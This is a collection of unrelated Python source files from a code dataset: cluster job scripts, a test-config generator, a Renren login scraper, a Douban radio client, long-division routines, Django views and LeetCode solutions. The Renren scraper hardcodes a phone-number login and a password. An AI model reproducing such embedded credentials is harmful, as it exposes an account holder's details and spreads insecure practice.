lancia_jobHtc(work_dir, cmd_string):\n\n \n \n run_command('cp /home/users/maldera/IXPE/ixpeTO/scanRecPars/analize/submit_analisi '+work_dir+'/.')\n \n crea_jobScript(cmd_string,work_dir)\n\n run_command('cd '+work_dir+' && condor_submit submit_analisi')\n \n\n \n\n\n\n\n\nn_iter=1\n#inizio scan su zero_thr\n#for dirName in dirs:\n\n#out_dir=base_dir+dirName+'/'\n \nfor i in range (1,max_iter):\n#for i in range (1,2):\n\n \n\n #work_dir=out_dir+str(i)\n\n out_dir='/data1/maldera/IXPE_work/rec_optimization/scanRmin-Ws/LxEbins/rec_'+str(i)+'/'\n work_dir=out_dir\n run_command('mkdir -p '+work_dir)\n \n\n run_command('cp '+ base_dir+'*/'+str(i)+'/config_simo.txt '+out_dir+'.')\n \n \n\n \n files_string=base_dir+'*/'+str(i)+'/*_recon.fits'\n #/data1/maldera/IXPE_work/rec_optimization/scanRmin-Ws/*/30/*_recon.fits\n\n print (\"file_string = \",files_string)\n \n cmd_string=' python /home/users/maldera/IXPE/ixpeTO/scanRecPars/analize/plotAll_simoLenghtXelongation.py '+files_string+' -o '+out_dir\n\n print (\"cmd=\",cmd_string)\n \n lancia_jobHtc(work_dir, cmd_string) \n \n #n_iter=n_iter+1\n\n \n","sub_path":"scanRecPars/analize/lancia_analisiSimo_LxEbins_HTcondor.py","file_name":"lancia_analisiSimo_LxEbins_HTcondor.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222299517","text":"import json\nimport itertools\nimport os\n\n\ndirectory = \"MPSTests\"\ntry:\n os.mkdir(directory)\nexcept(FileExistsError):\n pass\n\n\n\n\"\"\"variables to specify\"\"\"\n_L = [10]\n_J = [1]\n_seed = [12345]\n\n\n\"\"\"MPS\"\"\"\n_BondDim = [5,7,9]\n_SymmetryPeriod = [1]\n_SigmaRand= [0.01]\n_Diagonal= [False]\n\n\n\n\"\"\"Optimizer\"\"\"\n_optimizer = [\"AdaMax\"]\n_alpha=[0.001] #0.001\n_beta1=[0.9] #0.9\n_beta2=[0.999] #0.999\n_epscut=[1e-07] #1e-07\n\n\n\"\"\"Sampler\"\"\"\n_sampler = [\"MetropolisHop\"] #[\"MetropolisLocal\",\"MetropolisHop\"]\n_d_max = [5]\n\n\n\n\"\"\"VMC\"\"\"\n_discarded_samples = [500]\n_discarded_samples_on_init = [0]\n_method = [\"Gd\"] #[\"Gd\",\"Sr\"]\n_n_samples = [2000]\n_diag_shift = [0.01]\n_use_iterative = [False] #[False,True]\n_use_cholesky = [False] #[False,True]\n_target = [\"energy\"]\n_n_iter = [100]\n\n\ndef create_ip():\n \"\"\"Creates .ip Files out of the specifications above\"\"\"\n all_comb = itertools.product(_L, _J, _sampler, _BondDim,_SymmetryPeriod,_SigmaRand,_Diagonal,\n _optimizer, _alpha, _beta1, _beta2, _epscut, _discarded_samples,\n _discarded_samples_on_init, _method, _n_samples, _diag_shift, _use_iterative,\n _use_cholesky, _target,_n_iter,_d_max)\n\n for i in all_comb:\n\n if (i[2] == \"MetropolisLocal\"):\n\n dicc = {\n \"input\":{\n \"L\":i[0], \"J\":i[1],\n \"machine\":{\"type\":\"MPS\", \"BondDim\": i[3], \"SymmetryPeriod\":i[4], \"SigmaRand\":i[5],\"Diagonal\":i[6]},\n \"sampler\":{\"type\":i[2]},\n \"optimizer\":{\"type\":i[7], \"alpha\":i[8], \"beta1\":i[9], \"beta2\":i[10], \"epscut\":i[11]},\n \"VMC\": {\"n_samples\":i[15],\"discarded_samples\": i[12],\"discarded_samples_on_init\":i[13],\"target\": i[19], \"method\":i[14],\n \"diag_shift\": i[16],\"use_iterative\": i[17],\"use_cholesky\": i[18]},\n \"n_iter\":i[20]}\n }\n\n elif(i[2] == \"MetropolisHop\"):\n dicc = {\n \"input\":{\n \"L\":i[0], \"J\":i[1],\n \"machine\":{\"type\":\"MPS\", \"BondDim\": i[3], \"SymmetryPeriod\":i[4], \"SigmaRand\":i[5],\"Diagonal\":i[6]},\n \"sampler\":{\"type\":i[2],\"d_max\":i[21]},\n \"optimizer\":{\"type\":i[7], \"alpha\":i[8], \"beta1\":i[9], \"beta2\":i[10], \"epscut\":i[11]},\n \"VMC\": {\"n_samples\":i[15],\"discarded_samples\": i[12],\"discarded_samples_on_init\":i[13],\"target\": i[19], \"method\":i[14],\n \"diag_shift\": i[16],\"use_iterative\": i[17],\"use_cholesky\": i[18]},\n \"n_iter\":i[20]}\n }\n\n n = 1\n filename = directory + \"/\" + str(dicc[\"input\"][\"L\"]) + \"_\" + \"MPS\" + \"_\" + str(dicc[\"input\"][\"optimizer\"][\"type\"]) + \"_\" + str(dicc[\"input\"][\"sampler\"][\"type\"]) + str(n) + '.ip'\n filenamelog = directory + \"/\" + str(dicc[\"input\"][\"L\"]) + \"_\" + \"MPS\" + \"_\" + str(dicc[\"input\"][\"optimizer\"][\"type\"]) + \"_\" + str(dicc[\"input\"][\"sampler\"][\"type\"]) + str(n) + '.log'\n\n while (os.path.isfile(filename) or os.path.isfile(filenamelog)):\n\n n += 1\n filename = directory + \"/\" + str(dicc[\"input\"][\"L\"]) + \"_\" + \"MPS\" + \"_\" + str(\n dicc[\"input\"][\"optimizer\"][\"type\"]) + \"_\" + str(dicc[\"input\"][\"sampler\"][\"type\"]) + str(n) + '.ip'\n filenamelog = directory + \"/\" + str(dicc[\"input\"][\"L\"]) + \"_\" + \"MPS\" + \"_\" + str(\n dicc[\"input\"][\"optimizer\"][\"type\"]) + \"_\" + str(dicc[\"input\"][\"sampler\"][\"type\"]) + str(n) + '.log'\n\n with open(filename, 'w') as outfile:\n json.dump(dicc, outfile)\n\ncreate_ip()","sub_path":"HeisenbergS1/SamplerTests/FileGeneratorMPS.py","file_name":"FileGeneratorMPS.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498694970","text":"from urllib import request,parse\nfrom http import cookiejar\n#创建cookiejar实例\ncookie = cookiejar.MozillaCookieJar()\ncookie.load(\"cookie.txt\",ignore_expires=True,ignore_discard=True)\n#生成cookie的管理器\ncookie_handle = request.HTTPCookieProcessor(cookie)\n#创建http管理器\nhttp_handler = request.HTTPHandler()\n#生成https的管理器\nhttps_handler = request.HTTPSHandler()\n#创建请求管理器\nopener = request.build_opener(http_handler,https_handler,cookie_handle)\n\ndef login():\n \"\"\"\n 负责初次登陆\n 需要输入用户名密码,用来获取登陆cookie凭证\n :return:\n \"\"\"\n #此url 需要从登陆form的aciton属性中提取\n url = \"http://www.renren.com/PLogin.do\"\n\n #此键值需要从登陆form的两个对应input中提取name属性\n data = {\n \"email\":\"13119144223\",\n \"password\":\"123456\"\n }\n data = parse.urlencode(data)\n req = request.Request(url,data = data.encode())\n rsp = opener.open(req)\n\ndef getHomePage():\n url = \"http://www.renren.com/965187997/profile\"\n rsp = opener.open(url)\n\n html = rsp.read().decode()\n with open(\"rsp.html\",\"w\") as f:\n f.write(html)\n\nif __name__ == \"__main__\":\n\n getHomePage()\n\n","sub_path":"spider/v15.py","file_name":"v15.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"586237056","text":"#!/usr/bin/env python2\n\nimport StringIO\nimport urllib\nimport urllib2\nimport thread\nimport json\n\nclass Song(object):\n\tdef __init__(self):\n\t\tself.title = ''\n\t\tself.artist = ''\n\t\tself.album = ''\n\t\tself.pubdate = ''\n\t\tself.cover = ''\n\t\tself.url = ''\n\t\tself.sid = ''\n\t\tself.like = False\n\t\tself.state = ''\n\n\tdef __init__(self, jsonobj):\n\t\tself.title = jsonobj['title']\n\t\tself.artist = jsonobj['artist']\n\t\tself.album = jsonobj['albumtitle']\n\t\tself.pubdate = jsonobj['public_time']\n\t\tself.cover = jsonobj['picture']\n\t\tself.url = jsonobj['url']\n\t\tself.sid = jsonobj['sid']\n\t\tself.like = True if jsonobj['like'] == '1' else False\n\t\tself.state = ''\n\n\tdef toObj(self):\n\t\tobj = {\n\t\t\t'title': self.title,\n\t\t\t'artist': self.artist,\n\t\t\t'album': self.album,\n\t\t\t'pubdate': self.pubdate,\n\t\t\t'cover': self.cover,\n\t\t\t'url': self.url,\n\t\t\t'like': self.like,\n\t\t}\n\t\treturn obj\n\n\tdef info(self, playlist = None):\n\t\tresult = self.shortinfo() + \\\n\t\t\t\t'Artist: %s\\n' % self.artist + 'Title: %s\\n' % self.title + \\\n\t\t\t\t'Album: %s\\n' % self.album + 'Date: %s\\n' % self.pubdate + \\\n\t\t\t\t'Id: %s\\n' % self.sid\n\t\tif playlist:\n\t\t\tresult += 'Pos: %s\\n' % playlist.index(self)\n\t\treturn result\n\n\tdef shortinfo(self):\n\t\treturn 'file: %s\\n' % self.url\n\n\nclass Playlist(object):\n\tdef __init__(self, channel, uid, token, expire, playlist_changed = None):\n\t\tself.playlist = []\n\t\tself.playing = -1\n\n\t\tself.api = 'http://www.douban.com/j/app/radio/people'\n\t\tself.app_name = 'radio_desktop_win'\n\t\tself.version = '100'\n\t\tself.channel = channel\n\t\tself.uid = uid\n\t\tself.token = token\n\t\tself.expire = expire\n\n\t\tself.playlist_change_cb = playlist_changed\n\n\tdef history(self):\n\t\thistory = StringIO.StringIO()\n\t\ti = len(self.playlist) - 1\n\t\tc = 0\n\t\twhile i >= 0 and c < 10:\n\t\t\tsong = self.playlist[i]\n\t\t\tif song.state:\n\t\t\t\thistory.write('|%s:%s' % (song.sid, song.state))\n\t\t\t\tc += 1\n\t\treturn history.getvalue()\n\n\tdef next(self):\n\t\tif self.playing >= 0:\n\t\t\tself.playlist[self.playing].state = 'e'\n\t\t\tself.sendShortReport('e')\n\n\t\tif len(self.playlist) == 0:\n\t\t\tself.sendLongReport('n')\n\t\telif len(self.playlist) - 1 == self.playing:\n\t\t\tself.sendLongReport('p')\n\t\tself.playing += 1\n\t\tself.notifyCallbacks()\n\t\treturn self.playlist[self.playing]\n\n\tdef getNext(self):\n\t\tif len(self.playlist) > self.playing + 1:\n\t\t\treturn self.playlist[self.playing + 1]\n\t\telse:\n\t\t\treturn self.playlist[0]\n\n\tdef skip(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn None\n\n\t\tself.playlist[self.playing].state = 's'\n\t\tdel self.playlist[self.playing + 1:]\n\t\tself.sendLongReport('s')\n\n\t\tself.playing += 1\n\t\tself.notifyCallbacks()\n\t\treturn self.playlist[self.playing]\n\n\tdef prev(self):\n\t\tself.playing -= 1\n\t\tif self.playing == -1:\n\t\t\tself.playing = len(self.playlist) - 1\n\t\treturn self.playlist[self.playing]\n\n\tdef ban(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn None\n\n\t\tself.playlist[self.playing].state = 'b'\n\t\tdel self.playlist[self.playing + 1:]\n\t\tself.sendLongReport('b')\n\n\t\tself.playing += 1\n\t\tself.notifyCallbacks()\n\t\treturn self.playlist[self.playing]\n\n\tdef rate(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn False\n\n\t\tself.playlist[self.playing].like = True\n\t\tself.sendShortReport('r')\n\t\treturn True\n\n\tdef unrate(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn False\n\n\t\tself.playlist[self.playing].like = False\n\t\tself.sendShortReport('u')\n\t\treturn True\n\n\tdef sendLongReport(self, action):\n\t\tparams = {\n\t\t\t'app_name': self.app_name,\n\t\t\t'version': self.version,\n\t\t\t'user_id': self.uid,\n\t\t\t'expire': self.expire,\n\t\t\t'token': self.token,\n\t\t\t'channel': self.channel,\n\t\t\t'sid': self.playlist[self.playing].sid if self.playing >= 0 else '',\n\t\t\t'h': self.history(),\n\t\t\t'type': action,\n\t\t}\n\t\turl = '%s?%s' % (self.api, urllib.urlencode(params))\n\t\tf = urllib2.urlopen(url)\n\t\tobj = json.load(f)\n\t\tfor s in obj['song']:\n\t\t\ttry:\n\t\t\t\tsong = Song(s)\n\t\t\t\tself.playlist.append(song)\n\t\t\texcept KeyError:\n\t\t\t\tcontinue\n\t\tself.notifyCallbacks()\n\n\tdef sendShortReport(self, action):\n\t\tdef sendRequest(self, action):\n\t\t\tparams = {\n\t\t\t\t'app_name': self.app_name,\n\t\t\t\t'version': self.version,\n\t\t\t\t'user_id': self.uid,\n\t\t\t\t'expire': self.expire,\n\t\t\t\t'token': self.token,\n\t\t\t\t'channel': self.channel,\n\t\t\t\t'sid': self.playlist[self.playing].sid if self.playing >= 0 else '',\n\t\t\t\t'type': action,\n\t\t\t}\n\t\t\turl = '%s?%s' % (self.api, urllib.urlencode(params))\n\t\t\turllib2.urlopen(url)\n\t\tthread.start_new_thread(sendRequest, (self, action, ))\n\n\tdef setPlaying(self, song):\n\t\ttry:\n\t\t\tindex = self.playlist.index(song)\n\t\t\tif index != self.playing:\n\t\t\t\tself.playing = index\n\t\t\t\tself.notifyCallbacks()\n\t\texcept:\n\t\t\tpass\n\n\tdef notifyCallbacks(self):\n\t\tif self.playlist_change_cb:\n\t\t\tself.playlist_change_cb(self.playlist, self.playing)\n# vim: noet\n","sub_path":"fmplaylist.py","file_name":"fmplaylist.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149254823","text":"# takes in numerator, denominator, and places. Places represents how many decimal places to compute\n# going to assume numerator and denominator are both positive integers\ndef longDiv(numerator, denominator, places):\n res = \"\"\n decimal = False\n if numerator < denominator:\n decimal = True\n res = \"0.\"\n numStr = str(numerator)\n numIndex = 0\n decimalPlaces = 0\n remainder = int(numStr[numIndex])\n while(remainder != 0 and decimalPlaces < places):\n if remainder >= denominator:\n i = 0\n while (i < 10):\n i = i + 1\n if i * denominator > remainder:\n i = i - 1\n break\n res = res + str(i)\n if decimal:\n decimalPlaces = decimalPlaces + 1\n remainder = int(str(remainder - i * denominator))\n else:\n if res != \"\" and res != \"0.\":\n res = res + \"0\"\n if decimal:\n decimalPlaces = decimalPlaces + 1\n \n if remainder == 0:\n break\n numIndex = numIndex + 1\n if numIndex == len(numStr):\n if \".\" not in res:\n res = res + \".\"\n decimal = True\n numStr = numStr + \"0\"\n \n remainder = int(str(remainder) + numStr[numIndex])\n print(res)\n return res\n\n# sqrt will only take stuff > 1\ndef sqrtLongDiv(num, lim):\n decimalPlace = 0\n res = \"\"\n numStr = str(num)\n currDividend = \"\"\n front = -1\n back = -1\n if len(numStr) == 1 or len(numStr)%2 != 0:\n front = 0\n back = 1\n currDividend = numStr\n else:\n front = 0\n back = 2\n currDividend = numStr[front: back]\n divisor = \"\"\n\n # finds first digit\n currDivisor = 1\n while currDivisor**2 <= int(currDividend):\n currDivisor = currDivisor + 1\n currDivisor = currDivisor - 1\n res = str(currDivisor)\n remainder = int(currDividend) - currDivisor**2\n \n # find rest of the digits\n while len(res[decimalPlace:]) < lim and remainder != 0:\n currDividend = str(remainder)\n currDivisor = str(int(res) * 2)\n i = 0\n if back + 2 > len(numStr):\n if decimalPlace == 0:\n decimalPlace = len(res)\n numStr = numStr + \"00\"\n front = back\n back = back + 2\n currDividend = currDividend + numStr[front:back]\n while int(currDivisor + str(i)) * i <= int(currDividend):\n i = i + 1\n i = i - 1\n remainder = int(currDividend) - int(currDivisor + str(i)) * i\n # print(res, remainder, currDividend, currDivisor)\n res = res + str(i)\n if decimalPlace != 0:\n res = res[:decimalPlace] + \".\" + res[decimalPlace:]\n print(res)\n return res\n\ndef main():\n import math\n assert longDiv(10, 4, 20) == \"2.5\"\n assert longDiv(1260257, 37, 20) == \"34061\"\n assert longDiv(1, 3, 20) == \"0.33333333333333333333\"\n assert longDiv(10, 3, 20) == \"3.33333333333333333333\"\n assert longDiv(3923, 6173, 257) == \"0.63550947675360440628543657864895512716669366596468491819212700469787785517576543009881743074680058318483719423294994330147416167179653329013445650413089259679248339543171877531184189211080511906690426048922728009071764134132512554673578486959339057184513202\"\n\n assert sqrtLongDiv(2,20) == \"1.41421356237309504880\"\n assert sqrtLongDiv(1225,10) == \"35\"\n assert sqrtLongDiv(4,10) == \"2\"\n assert sqrtLongDiv(100,10) == \"10\"\n assert sqrtLongDiv(49,10) == \"7\"\n assert sqrtLongDiv(10000,10) == \"100\"\n assert sqrtLongDiv(4356,10) == \"66\"\n assert sqrtLongDiv(625,10) == \"25\"\n\nif __name__ == '__main__':\n main()","sub_path":"misc_funcs/longDiv.py","file_name":"longDiv.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"348623702","text":"from django.http import HttpResponse, HttpRequest\nfrom django.shortcuts import render\nfrom django.urls import reverse\n\nfrom recipe_db.models import Recipe, Style, Hop, Fermentable, Yeast\nfrom web_app.charts.fermentable import FermentableChartFactory\nfrom web_app.charts.hop import HopChartFactory\nfrom web_app.charts.style import StyleChartFactory\nfrom web_app.charts.yeast import YeastChartFactory\nfrom web_app.meta import PageMeta, HomeMeta\n\n\ndef home(request: HttpRequest) -> HttpResponse:\n recipes = Recipe.objects.count()\n meta = HomeMeta().get_meta()\n return render(request, 'index.html', {'recipes': recipes, 'meta': meta})\n\n\ndef legal(request: HttpRequest) -> HttpResponse:\n meta = PageMeta.create('Legal', 'Legal information about Beer Analytics', url=reverse('legal'))\n meta.extra_props = {'robots': 'noindex'}\n return render(request, 'legal.html', {'meta': meta})\n\n\ndef about(request: HttpRequest) -> HttpResponse:\n recipes = Recipe.objects.count()\n meta = PageMeta.create('About', url=reverse('about'))\n return render(request, 'about.html', {'recipes': recipes, 'meta': meta})\n\n\ndef sitemap(request: HttpRequest) -> HttpResponse:\n styles = Style.objects.filter(recipes_count__gt=0)\n hops = Hop.objects.filter(recipes_count__gt=0)\n fermentables = Fermentable.objects.filter(recipes_count__gt=0)\n yeasts = Yeast.objects.filter(recipes_count__gt=0)\n\n return render(request, 'sitemap.xml', {\n 'styles': styles,\n 'hops': hops,\n 'fermentables': fermentables,\n 'yeasts': yeasts,\n 'style_chart_types': StyleChartFactory.get_types(),\n 'hop_chart_types': HopChartFactory.get_types(),\n 'fermentable_chart_types': FermentableChartFactory.get_types(),\n 'yeast_chart_types': YeastChartFactory.get_types(),\n }, content_type='text/xml')\n","sub_path":"web_app/views/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"400817781","text":"import webbrowser # import the webrowser which is used to open the the trailer\r\n\r\n\r\nclass Movie(): # used to define the class MOVIE\r\n \"\"\"bang bang bangati bang, bang bang bandati bang\"\"\"\r\n VALID_RATINGS = [\"1\", \"2\", \"3\", \"4\"]\r\n \r\n def __init__(self, movie_title, movie_storyline,\r\n movie_poster, youtube_trailer):\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster = movie_poster\r\n self.trailer = youtube_trailer\r\n \r\n def show_trailer(self): # used to open the trailer\r\n webbrowser.open(self.trailer)\r\n \r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262036974","text":"#\n# @lc app=leetcode id=200 lang=python3\n#\n# [200] Number of Islands\n#\n# https://leetcode.com/problems/number-of-islands/description/\n#\n# algorithms\n# Medium (44.04%)\n# Likes: 3769\n# Dislikes: 137\n# Total Accepted: 507.3K\n# Total Submissions: 1.1M\n# Testcase Example:\n# '[[\"1\",\"1\",\"1\",\"1\",\"0\"],\n# [\"1\",\"1\",\"0\",\"1\",\"0\"],\n# [\"1\",\"1\",\"0\",\"0\",\"0\"],\n# [\"0\",\"0\",\"0\",\"0\",\"0\"]]'\n#\n# Given a 2d grid map of '1's (land) and '0's (water), count the number of\n# islands. An island is surrounded by water and is formed by connecting\n# adjacent lands horizontally or vertically. You may assume all four edges of\n# the grid are all surrounded by water.\n#\n# Example 1:\n#\n#\n# Input:\n# 11110\n# 11010\n# 11000\n# 00000\n#\n# Output: 1\n#\n#\n# Example 2:\n#\n#\n# Input:\n# 11000\n# 11000\n# 00100\n# 00011\n#\n# Output: 3\n#\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass UF:\n def __init__(self, grid: List[List[str]]):\n self.parents = [-1 for _ in range(len(grid) * len(grid[0]))]\n self.sizes = [1 for _ in range(len(grid) * len(grid[0]))]\n self.count = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n self.count += 1\n lst_coord = i * len(grid[0]) + j\n self.parents[lst_coord] = lst_coord\n return\n\n def find(self, coord: int) -> int:\n root_coord = coord\n while root_coord != self.parents[root_coord]:\n root_coord = self.parents[root_coord]\n while coord != root_coord:\n temp = self.parents[coord]\n self.parents[coord] = root_coord\n coord = temp\n return root_coord\n\n def union(self, coord1: int, coord2: int) -> None:\n root1 = self.find(coord1)\n root2 = self.find(coord2)\n if root1 == root2:\n return\n if self.sizes[root1] >= self.sizes[root2]:\n self.parents[root2] = root1\n self.sizes[root1] += self.sizes[root2]\n else:\n self.parents[root1] = root2\n self.sizes[root2] += self.sizes[root1]\n self.count -= 1\n return\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n return self.union_find_soln(grid)\n\n def union_find_soln(self, grid: List[List[str]]) -> int:\n \"\"\"\n Union Find solution\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n\n uf = UF(grid)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n coord1 = i * len(grid[0]) + j\n if i < len(grid) - 1 and grid[i + 1][j] == \"1\":\n coord2 = (i + 1) * len(grid[0]) + j\n uf.union(coord1, coord2)\n if j < len(grid[0]) - 1 and grid[i][j + 1] == \"1\":\n coord2 = i * len(grid[0]) + j + 1\n uf.union(coord1, coord2)\n return uf.count\n\n def dfs_soln(self, grid: List[List[str]]) -> int:\n \"\"\"\n DFS solution\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n\n def erase_1s(row: int, col: int) -> None:\n if row < 0 or row == len(grid) or col < 0 or col == len(grid[0]) \\\n or grid[row][col] == \"0\":\n return\n grid[row][col] = \"0\"\n erase_1s(row - 1, col)\n erase_1s(row + 1, col)\n erase_1s(row, col - 1)\n erase_1s(row, col + 1)\n return\n\n count = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n count += 1\n erase_1s(i, j)\n return count\n\n def bfs_soln(self, grid: List[List[str]]) -> int:\n \"\"\"\n BFS solution\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n\n offsets = (0, 1, 0, -1, 0)\n count = 0\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n count += 1\n todo = []\n todo.insert(0, (i, j))\n grid[i][j] = \"0\"\n while len(todo) != 0:\n curr = todo.pop()\n for k in range(len(offsets) - 1):\n r = curr[0] + offsets[k]\n c = curr[1] + offsets[k + 1]\n if 0 <= r < len(grid) and 0 <= c < len(grid[0]) \\\n and grid[r][c] == \"1\":\n grid[r][c] = \"0\"\n todo.insert(0, (r, c))\n return count\n\n# @lc code=end\n\n\nif __name__ == \"__main__\":\n g = [\n [\"1\", \"1\", \"1\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\"]\n ]\n print(Solution().numIslands(g), 1)\n\n g = [\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"1\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"1\", \"1\"]\n ]\n print(Solution().numIslands(g), 3)\n\n g = [[\"1\"], [\"1\"]]\n print(Solution().numIslands(g), 1)\n","sub_path":"Python/200.number-of-islands.py","file_name":"200.number-of-islands.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"140223803","text":"import json, wordninja\nimport pandas as pd\nfrom requests import get\nfrom collections import defaultdict\nfrom math import isnan, nan\n\nfrom flask import request\nfrom time import time\n\nfrom .metadata import PropertyMetaData\nfrom .ranking import PropertyRanker\nfrom .settings import FILE_claims_property, JSON_constraints, KGTK_search\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass PropertyFinder(object):\n metadata = PropertyMetaData()\n ranker = PropertyRanker()\n\n def __init__(self, host=KGTK_search,\n metadata_constraints=JSON_constraints,\n query_size=500, use_ninja=True, use_part=True):\n self.host = host\n\n self.map_P1696 = self.gen_relation('P1696')\n self.map_P1647 = self.gen_relation('P1647', False)\n self.map_P6609 = self.gen_relation('P6609', False)\n self.map_P1659 = self.gen_relation('P1659')\n\n with open(metadata_constraints) as fp:\n self.constraints = json.load(fp)\n\n self.query_size = query_size\n self.ninja = use_ninja\n self.partial_query = use_part\n\n def _query(self, label, type_=None):\n ''' Given a query string: label,\n get relevant properties from the KGTK-search API\n '''\n response2 = get(\n f'{self.host}/{label}?extra_info=true&language=en&item=property&type=ngram'\n f'&size={self.query_size}&instance_of=',\n verify=False)\n query_result = set([x['qnode'] for x in response2.json()])\n\n try:\n # Split word using wordninja\n if len(query_result) == 0 and self.ninja:\n label_splitted = ' '.join([x[:10] for x in wordninja.split(label)])\n response2 = get(\n f'{self.host}/{label_splitted}?language=en&item=property'\n f'&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2.json():\n query_result.add(x['qnode'])\n\n # Use a part of the input as the query string\n if len(query_result) == 0 and self.partial_query:\n\n label_splitted = [x[:10] for x in wordninja.split(label)]\n\n response2a = get(\n f'{self.host}/{label_splitted[0]}?extra_info=true&language=en&item=property'\n f'&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2a.json():\n query_result.add(x['qnode'])\n\n response2b = get(\n f'{self.host}/{label_splitted[-1]}?extra_info=true&language=en&item=property'\n f'&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2b.json():\n query_result.add(x['qnode'])\n\n if len(label_splitted) > 2:\n\n response2c = get(\n f'{self.host}/{label_splitted[0] + label_splitted[1]}?extra_info=true'\n f'&language=en&item=property&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2c.json():\n query_result.add(x['qnode'])\n\n response2d = get(\n f'{self.host}/{label_splitted[-2] + label_splitted[-1]}?extra_info=true'\n f'&language=en&item=property&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2d.json():\n query_result.add(x['qnode'])\n except:\n return []\n\n if type_:\n return [x for x in query_result if\n PropertyFinder.metadata.check_property_exists(x) and PropertyFinder.metadata.check_type(x, type_)]\n\n return [x for x in query_result]\n\n def filter_by_set(self, s, l):\n ''' Return all the unique values in l,\n save all the values to set s\n '''\n r = [i for i in l if not i in s]\n r = list(set(r))\n for i in r:\n s.add(i)\n return s, r\n\n def gen_relation(self, label, twoway=True):\n ''' Given a relation R, generate the triples such that\n X R Y, containing all X, Y that satisfying this relation\n '''\n pr = pd.read_csv(FILE_claims_property, sep='\\t', usecols=['node1', 'label', 'node2'])\n pr = pr[pr['label'].apply(lambda x: x == label)].reset_index(drop=True)\n pr = pr[['node1', 'node2']]\n\n pr1 = pr.groupby('node1')['node2'].apply(list).reset_index()\n pr_dict = pr1.set_index('node1').to_dict()['node2']\n\n pr_dict_r = defaultdict(list)\n for k, v in pr_dict.items():\n for vi in v:\n pr_dict_r[k].append(vi)\n\n return pr_dict_r\n\n def get_candidates(self, name_, type_):\n ''' Get all the candidates given a query string: name_, and the specified type_\n Returns: Dict[List]\n 1 -> properties whose label/aliases matches with query string\n 2 -> relevant properties to category (1), using P1696, P1647, P6609\n 3 -> relevant properties to category (1), using P1659\n '''\n result = self._query(name_, type_)\n\n ranked = {}\n loaded = set()\n loaded, ranked[1] = self.filter_by_set(loaded, result)\n\n ranked[2] = []\n for z in result:\n ranked[2] += self.map_P1696[z] + self.map_P1647[z] + self.map_P6609[z]\n loaded, ranked[2] = self.filter_by_set(loaded, ranked[2])\n\n ranked[3] = []\n for z in result:\n ranked[3] += self.map_P1659[z]\n loaded, ranked[3] = self.filter_by_set(loaded, ranked[3])\n\n if type_ is None:\n return ranked\n\n r = {}\n r[0] = []\n for i, L in enumerate(ranked):\n r[i + 1] = []\n for pnode in ranked[L]:\n if PropertyFinder.metadata.check_type(pnode, type_):\n r[i + 1].append(pnode)\n\n r[4] = []\n\n return r\n\n def filter_ranked(self, ranked, params):\n ''' Rule-based filtering\n Using several wikidata constraints\n '''\n ranked = self.filter_by_item(ranked)\n\n if params['scope'] != 'both':\n ranked = self.filter_by_scope(ranked, params['scope'])\n\n ranked = self.filter_by_allowed_qualifiers(ranked, params['constraint'])\n ranked = self.filter_by_required_qualifiers(ranked, params['constraint'])\n\n ranked = self.filter_by_conflicts(ranked, params['otherProperties'])\n return ranked\n\n def filter_by_item(self, ranked):\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if pnode in self.constraints and 'noitem' in self.constraints[pnode]:\n continue\n r[k].append(pnode)\n return r\n\n def filter_by_scope(self, ranked, scope='both'):\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n\n if not pnode in self.constraints:\n r[k].append(pnode)\n continue\n\n info = self.constraints[pnode]\n if scope == 